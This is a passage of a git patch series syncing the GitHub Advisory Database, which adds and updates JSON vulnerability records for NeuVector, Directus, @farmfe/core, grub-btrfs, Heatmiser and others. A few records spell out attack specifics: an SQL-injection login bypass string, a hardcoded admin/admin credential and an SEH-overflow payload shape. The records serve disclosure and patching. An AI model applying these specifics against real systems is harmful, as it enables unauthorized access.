b/advisories/github-reviewed/2026/02/GHSA-3c9m-gq32-g4jx/GHSA-3c9m-gq32-g4jx.json new file mode 100644 index 0000000000000..31d47a7ab70e5 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3c9m-gq32-g4jx/GHSA-3c9m-gq32-g4jx.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c9m-gq32-g4jx", + "modified": "2026-02-12T22:14:02Z", + "published": "2026-02-12T22:14:02Z", + "aliases": [ + "CVE-2025-67860" + ], + "summary": "NeuVector scanner insecurely handles passwords as command arguments", + "details": "### Impact\nA vulnerability has been identified in the NeuVector scanner where the scanner process accepts registry and controller credentials as command-line arguments, potentially exposing sensitive credentials to local users. This may allow unauthorized access to registries or the NeuVector controller, potentially enabling image manipulation, information disclosure, or further lateral movement within the environment.\n\n**Important:**\n- For the exposure of credentials not related to Rancher NeuVector, the final impact severity for confidentiality, integrity and availability is dependent on the permissions the leaked credentials have on their services.\n- It is recommended to review for potentially leaked credentials in this scenario and to change them if deemed necessary.\n\nPlease consult the associated [MITRE ATT&CK – Technique – Credential Access and Unsecured Credentials](https://attack.mitre.org/techniques/T1552/) for further information about this category of attack.\n\n### Patches\nPatched versions include release `v4.072` and above.\n\nStarting from version `v4.072`, the scanner monitor process does not pass credentials to the scanner anymore. Instead, scanner process gets credentials information from environment variables, preventing them from being exposed through `/proc/*/cmdline`.\n\n### Workarounds\nThere is no workaround for this issue. Users are recommended to upgrade, as soon as possible, to a version of NeuVector scanner that contains the fix.\n\n### References\nIf you have any questions or comments about this advisory:\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.\n- Open an issue in the [NeuVector](https://github.com/neuvector/neuvector/issues/new/choose) repository.\n- Verify with our [support matrix](https://www.suse.com/suse-neuvector/support-matrix/all-supported-versions/neuvector-v-all-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/#suse-security).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/neuvector/scanner" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0" + }, + { + "fixed": "4.072" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/neuvector/scanner/security/advisories/GHSA-3c9m-gq32-g4jx" + }, + { + "type": "WEB", + "url": "https://github.com/neuvector/scanner/commit/c2f0f9268468e49eb3addea923156123c4465794" + }, + { + "type": "PACKAGE", + "url": "https://github.com/neuvector/scanner" + }, + { + "type": "WEB", + "url": "https://github.com/neuvector/scanner/releases/tag/v4.072" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:14:02Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json b/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json new file mode 100644 index 0000000000000..8352be849afb8 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jr94-gj3h-c8rf", + "modified": "2026-02-12T22:13:04Z", + "published": "2026-02-12T22:13:04Z", + "aliases": [ + "CVE-2026-26185" + ], + "summary": "Directus Vulnerable to User Enumeration via Password Reset Timing Attack", + "details": "### Summary\n\nA timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration.\n\n### Details\n\nThe password reset endpoint implements a timing protection mechanism to prevent user enumeration; however, URL validation executes before the timing protection is applied. This allows an attacker to distinguish between valid and invalid user accounts based on response timing differences.\n\n### Impact\n\nThis vulnerability violates user privacy and may facilitate targeted phishing attacks by allowing attackers to confirm the existence of user accounts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "directus" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.14.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "@directus/api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "32.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf" + }, + { + "type": "WEB", + "url": "https://github.com/directus/directus/pull/26485" + }, + { + "type": "WEB", + "url": "https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/directus/directus" + }, + { + "type": "WEB", + "url": "https://github.com/directus/directus/releases/tag/v11.14.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:13:04Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json b/advisories/github-reviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json similarity index 65% rename from advisories/unreviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json rename to advisories/github-reviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json index 85f352eadef4a..ee8c420a9505a 100644 --- a/advisories/unreviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json +++ b/advisories/github-reviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-p773-8mf4-rjm5", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-12T22:14:12Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2025-56647" ], + "summary": "@farmfe/core is Missing Origin Validation in WebSocket", "details": "npm @farmfe/core before 1.7.6 is Missing Origin Validation in WebSocket. The development (hot module reloading) server does not validate origin when connecting to a WebSocket client. This allows attackers to surveil developers running Farm who visit their webpage and steal source code that is leaked by the WebSocket server.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@farmfe/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.7.6" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -30,6 +51,10 @@ { "type": "WEB", "url": "https://gist.github.com/R4356th/d4372c6f83275d583c180c0e7d7332af" + }, + { + "type": "PACKAGE", + "url": "https://github.com/farm-fe/farm" } ], "database_specific": { @@ -37,8 +62,8 @@ "CWE-1385" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:14:11Z", "nvd_published_at": "2026-02-12T16:16:03Z" } } \ No newline at end of file From 8a1ba066c64e7b29e3251b2a26808714940233b9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 00:34:10 +0000 Subject: [PATCH 054/215] Advisory Database Sync --- .../GHSA-3v2r-86vj-q55q.json | 9 ++- .../GHSA-238q-xh37-pmhj.json | 15 +++-- .../GHSA-2fcc-cgw7-6rrw.json | 37 ++++++++++++ .../GHSA-2qgw-p96m-xw4g.json | 48 +++++++++++++++ .../GHSA-2qq2-jxgg-2w76.json | 40 +++++++++++++ .../GHSA-3frw-32pg-5m86.json | 15 +++-- .../GHSA-44j4-34hp-pwwr.json | 15 +++-- .../GHSA-4mqf-r24p-f3vh.json | 52 ++++++++++++++++ .../GHSA-52hp-7f37-p36r.json | 52 ++++++++++++++++ .../GHSA-58fv-c7h9-wg86.json | 48 +++++++++++++++ .../GHSA-5fwp-233p-3m7m.json | 15 +++-- .../GHSA-649g-63pg-hvqg.json | 29 +++++++++ .../GHSA-6qxf-3mq6-3g8x.json | 48 +++++++++++++++ .../GHSA-6vwx-x7rh-q2gj.json | 48 +++++++++++++++ .../GHSA-6w4g-qqq8-cvqr.json | 48 +++++++++++++++ .../GHSA-7p49-g593-x646.json | 15 +++-- .../GHSA-869w-qxf5-5q39.json | 39 ++++++++++++ .../GHSA-8jg3-vm8w-m4r8.json | 15 +++-- .../GHSA-92fh-pv8f-mv7c.json | 48 +++++++++++++++ .../GHSA-9vhj-ww26-xqw7.json | 48 +++++++++++++++ .../GHSA-9wpq-3w4j-985q.json | 48 +++++++++++++++ .../GHSA-cgv7-pmv5-q49x.json | 52 ++++++++++++++++ .../GHSA-g6q7-8v7v-98q7.json | 60 +++++++++++++++++++ .../GHSA-ggf8-hhhc-6pgc.json | 48 +++++++++++++++ .../GHSA-grvx-723j-w74g.json | 48 +++++++++++++++ .../GHSA-h5j4-jj3m-xgpg.json | 48 +++++++++++++++ .../GHSA-j2hg-vp99-659f.json | 52 ++++++++++++++++ .../GHSA-m2gf-58fp-54j4.json | 40 +++++++++++++ .../GHSA-m668-xfwp-34x6.json | 1 + .../GHSA-mg52-9q5r-pwrf.json | 52 ++++++++++++++++ .../GHSA-p5cr-gq3j-93c4.json | 33 ++++++++++ .../GHSA-pmfg-h9xp-96jh.json | 15 +++-- .../GHSA-qq3h-f6g7-3484.json | 15 +++-- .../GHSA-r63r-4348-x8g9.json | 52 ++++++++++++++++ .../GHSA-r942-7mj9-p58w.json | 4 +- .../GHSA-rfq8-v234-58w4.json | 15 +++-- .../GHSA-rr27-5cg7-jpp5.json | 15 +++-- .../GHSA-rrc9-5ccp-4p2x.json | 52 ++++++++++++++++ .../GHSA-rxgx-jjvj-9w6v.json | 52 ++++++++++++++++ .../GHSA-v3jv-jh9h-w9c8.json | 48 +++++++++++++++ .../GHSA-v5m9-phxh-m6wj.json | 52 ++++++++++++++++ .../GHSA-vp56-39mv-f923.json | 52 ++++++++++++++++ .../GHSA-w785-qrg6-5h74.json | 52 ++++++++++++++++ .../GHSA-wj5q-5q5g-5j5w.json | 52 ++++++++++++++++ .../GHSA-wj8f-mjpv-f78g.json | 11 +++- .../GHSA-x252-4r5q-2hc6.json | 48 +++++++++++++++ .../GHSA-x79w-g7mm-hjhj.json | 48 +++++++++++++++ .../GHSA-xqcm-jrw9-wq72.json | 48 +++++++++++++++ 48 files changed, 1751 insertions(+), 46 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-2fcc-cgw7-6rrw/GHSA-2fcc-cgw7-6rrw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2qgw-p96m-xw4g/GHSA-2qgw-p96m-xw4g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2qq2-jxgg-2w76/GHSA-2qq2-jxgg-2w76.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4mqf-r24p-f3vh/GHSA-4mqf-r24p-f3vh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-52hp-7f37-p36r/GHSA-52hp-7f37-p36r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-58fv-c7h9-wg86/GHSA-58fv-c7h9-wg86.json create mode 100644 advisories/unreviewed/2026/02/GHSA-649g-63pg-hvqg/GHSA-649g-63pg-hvqg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6qxf-3mq6-3g8x/GHSA-6qxf-3mq6-3g8x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6vwx-x7rh-q2gj/GHSA-6vwx-x7rh-q2gj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6w4g-qqq8-cvqr/GHSA-6w4g-qqq8-cvqr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-869w-qxf5-5q39/GHSA-869w-qxf5-5q39.json create mode 100644 advisories/unreviewed/2026/02/GHSA-92fh-pv8f-mv7c/GHSA-92fh-pv8f-mv7c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9vhj-ww26-xqw7/GHSA-9vhj-ww26-xqw7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9wpq-3w4j-985q/GHSA-9wpq-3w4j-985q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cgv7-pmv5-q49x/GHSA-cgv7-pmv5-q49x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g6q7-8v7v-98q7/GHSA-g6q7-8v7v-98q7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ggf8-hhhc-6pgc/GHSA-ggf8-hhhc-6pgc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-grvx-723j-w74g/GHSA-grvx-723j-w74g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h5j4-jj3m-xgpg/GHSA-h5j4-jj3m-xgpg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j2hg-vp99-659f/GHSA-j2hg-vp99-659f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m2gf-58fp-54j4/GHSA-m2gf-58fp-54j4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mg52-9q5r-pwrf/GHSA-mg52-9q5r-pwrf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r63r-4348-x8g9/GHSA-r63r-4348-x8g9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rrc9-5ccp-4p2x/GHSA-rrc9-5ccp-4p2x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rxgx-jjvj-9w6v/GHSA-rxgx-jjvj-9w6v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v3jv-jh9h-w9c8/GHSA-v3jv-jh9h-w9c8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v5m9-phxh-m6wj/GHSA-v5m9-phxh-m6wj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vp56-39mv-f923/GHSA-vp56-39mv-f923.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w785-qrg6-5h74/GHSA-w785-qrg6-5h74.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wj5q-5q5g-5j5w/GHSA-wj5q-5q5g-5j5w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x252-4r5q-2hc6/GHSA-x252-4r5q-2hc6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x79w-g7mm-hjhj/GHSA-x79w-g7mm-hjhj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json diff --git a/advisories/unreviewed/2022/05/GHSA-3v2r-86vj-q55q/GHSA-3v2r-86vj-q55q.json b/advisories/unreviewed/2022/05/GHSA-3v2r-86vj-q55q/GHSA-3v2r-86vj-q55q.json index 14e8657ffbf2b..d05357a1a9f55 100644 --- a/advisories/unreviewed/2022/05/GHSA-3v2r-86vj-q55q/GHSA-3v2r-86vj-q55q.json +++ b/advisories/unreviewed/2022/05/GHSA-3v2r-86vj-q55q/GHSA-3v2r-86vj-q55q.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3v2r-86vj-q55q", - "modified": "2022-05-24T17:14:28Z", + "modified": "2026-02-13T00:32:50Z", "published": "2022-05-24T17:14:28Z", "aliases": [ "CVE-2020-0919" ], "details": "An elevation of privilege vulnerability exists in Remote Desktop App for Mac in the way it allows an attacker to load unsigned binaries, aka 'Microsoft Remote Desktop App for Mac Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2026/02/GHSA-238q-xh37-pmhj/GHSA-238q-xh37-pmhj.json b/advisories/unreviewed/2026/02/GHSA-238q-xh37-pmhj/GHSA-238q-xh37-pmhj.json index d3b27dc3560dd..0d25e17e09893 100644 --- a/advisories/unreviewed/2026/02/GHSA-238q-xh37-pmhj/GHSA-238q-xh37-pmhj.json +++ b/advisories/unreviewed/2026/02/GHSA-238q-xh37-pmhj/GHSA-238q-xh37-pmhj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-238q-xh37-pmhj", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-11T21:30:40Z", "aliases": [ "CVE-2024-26477" ], "details": "An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the api parameter of the oauth, amazon_sns, export endpoints.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T20:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2fcc-cgw7-6rrw/GHSA-2fcc-cgw7-6rrw.json b/advisories/unreviewed/2026/02/GHSA-2fcc-cgw7-6rrw/GHSA-2fcc-cgw7-6rrw.json new file mode 100644 index 0000000000000..0c4dc258fe2b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2fcc-cgw7-6rrw/GHSA-2fcc-cgw7-6rrw.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2fcc-cgw7-6rrw", + "modified": "2026-02-13T00:32:51Z", + "published": "2026-02-13T00:32:51Z", + "aliases": [ + "CVE-2026-25828" + ], + "details": "grub-btrfs through 2026-01-31 (on Arch Linux and derivative distributions) allows initramfs OS command injection because it does not sanitize the $root parameter to resolve_device().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25828" + }, + { + "type": "WEB", + "url": "https://archlinux.org/packages/extra/any/grub-btrfs" + }, + { + "type": "WEB", + "url": "https://github.com/Antynea/grub-btrfs/tree/master" + }, + { + "type": "WEB", + "url": "https://github.com/cardosource/CVE-2026-25828" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2qgw-p96m-xw4g/GHSA-2qgw-p96m-xw4g.json b/advisories/unreviewed/2026/02/GHSA-2qgw-p96m-xw4g/GHSA-2qgw-p96m-xw4g.json new file mode 100644 index 0000000000000..bacc7b76ce286 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2qgw-p96m-xw4g/GHSA-2qgw-p96m-xw4g.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qgw-p96m-xw4g", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25335" + ], + "details": "PRO-7070 Hazır Profesyonel Web Sitesi version 1.0 contains an authentication bypass vulnerability in the administration panel login page. Attackers can bypass authentication by using '=' 'or' as both username and password to gain unauthorized access to the administrative interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25335" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47758" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/pro-haz%C4%B1r-profesyonel-web-sitesi-authentication-by" + }, + { + "type": "WEB", + "url": "https://www.websitem.biz/hazir-site/pro-7070-hazir-mobil-tablet-uyumlu-web-sitesi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2qq2-jxgg-2w76/GHSA-2qq2-jxgg-2w76.json b/advisories/unreviewed/2026/02/GHSA-2qq2-jxgg-2w76/GHSA-2qq2-jxgg-2w76.json new file mode 100644 index 0000000000000..af8f9fb8eee21 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2qq2-jxgg-2w76/GHSA-2qq2-jxgg-2w76.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qq2-jxgg-2w76", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2024-21961" + ], + "details": "Improper restriction of operations within the bounds of a memory buffer in PCIe® Link could allow an attacker with access to a guest virtual machine to potentially perform a denial of service attack against the host resulting in loss of availability.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21961" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3023.html" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4013.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T00:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3frw-32pg-5m86/GHSA-3frw-32pg-5m86.json b/advisories/unreviewed/2026/02/GHSA-3frw-32pg-5m86/GHSA-3frw-32pg-5m86.json index dbba53d30536e..6f402a209550c 100644 --- a/advisories/unreviewed/2026/02/GHSA-3frw-32pg-5m86/GHSA-3frw-32pg-5m86.json +++ b/advisories/unreviewed/2026/02/GHSA-3frw-32pg-5m86/GHSA-3frw-32pg-5m86.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3frw-32pg-5m86", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2026-20611" ], "details": "An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-44j4-34hp-pwwr/GHSA-44j4-34hp-pwwr.json b/advisories/unreviewed/2026/02/GHSA-44j4-34hp-pwwr/GHSA-44j4-34hp-pwwr.json index 1da5c61ff4db7..e816b1f2bee31 100644 --- a/advisories/unreviewed/2026/02/GHSA-44j4-34hp-pwwr/GHSA-44j4-34hp-pwwr.json +++ b/advisories/unreviewed/2026/02/GHSA-44j4-34hp-pwwr/GHSA-44j4-34hp-pwwr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-44j4-34hp-pwwr", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-11T21:30:40Z", "aliases": [ "CVE-2024-26479" ], "details": "An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the Command execution function.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T20:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4mqf-r24p-f3vh/GHSA-4mqf-r24p-f3vh.json b/advisories/unreviewed/2026/02/GHSA-4mqf-r24p-f3vh/GHSA-4mqf-r24p-f3vh.json new file mode 100644 index 0000000000000..b53864fd88279 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4mqf-r24p-f3vh/GHSA-4mqf-r24p-f3vh.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mqf-r24p-f3vh", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25322" + ], + "details": "Heatmiser Netmonitor 3.03 contains a hardcoded credentials vulnerability in the networkSetup.htm page with predictable admin login credentials. Attackers can access the device by using the hard-coded username 'admin' and password 'admin' in the hidden form input fields.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25322" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20190724160628/https://www.heatmiser.com/en" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47823" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/heatmiser-netmonitor-hardcoded-credentials" + }, + { + "type": "WEB", + "url": "https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-52hp-7f37-p36r/GHSA-52hp-7f37-p36r.json b/advisories/unreviewed/2026/02/GHSA-52hp-7f37-p36r/GHSA-52hp-7f37-p36r.json new file mode 100644 index 0000000000000..3bc3b44c23605 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-52hp-7f37-p36r/GHSA-52hp-7f37-p36r.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-52hp-7f37-p36r", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25330" + ], + "details": "SurfOffline Professional 2.2.0.103 contains a structured exception handler (SEH) overflow vulnerability that allows attackers to crash the application by manipulating the project name input. Attackers can generate a malicious payload of 382 'A' characters followed by specific byte sequences to trigger a denial of service condition and overwrite SEH registers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25330" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20190717003929/http://www.bimesoft.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47795" + }, + { + "type": "WEB", + "url": "https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/surfoffline-professional-project-name-denial-of-se" + } + ], + "database_specific": { 